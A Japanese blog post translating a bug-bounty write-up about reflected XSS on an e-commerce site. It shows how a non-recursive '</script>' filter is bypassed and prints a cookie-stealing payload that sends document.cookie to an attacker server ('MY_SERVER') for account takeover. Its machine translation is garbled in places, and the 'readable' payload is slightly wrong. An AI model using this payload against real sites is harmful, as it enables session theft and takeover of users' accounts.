How I found Reflected XSS which leads to Account Takeover on an E-commerce website から学ぶ

ソース:

medium.com

 

脆弱性XSS

 

訳:

Web サイトがexample.com.vn であるとします。

私は次のような無邪気な検索から始めました。
<h1>Hello</h1>そしてこれが私が見つけたもので。

 

検索結果は json 内の <script> 鬼ごっこ

それから私はその状況から抜け出そうとしました <script>タグとサーバーが応答したのには驚き

 

 

私は検索しました %3C%2Fscript%3EHello%20thereURLデコードされたものは </script>Hello there

ただし、サーバーが応答で返したものには何もありませんでした。 </script>
これは、サーバーが発生した問題を削除しようとしたことを意味し。
</script>ごっこ
それから、私はずっと前に学んだトリックを使用して、再帰的に削除されるかどうかを確認しました。
を挿入してみました </script>各文字間のタグ、 </s</script>c</script>r</script>i</script>p</script>t>Hello there
スクリプト タグからの離脱に成功し、アカウントを引き継ぐために使用した最終ペイロードは次のとおりです。

</s</script>cri</script>pt><img src="x" on</script>error=d</script>ocu</script>ment</script>.</script>loca</script>tion</script>.</script>h</script>ref='MY_SERVER?cookie='+do</script>cumen</script>t.c</script>ooki</script>e>


読み取り可能なバージョンは、
</script><img src="x" onerror=document.href='MY_SERVER?cookie='+document.cookie>

 

 

ユーザーがリンクをクリックすると、Cookie とともに私のサーバーにリダイレクトされるため、私は彼らの Cookie を盗んでアカウントを乗っ取ることができました。 

 

ほなほな。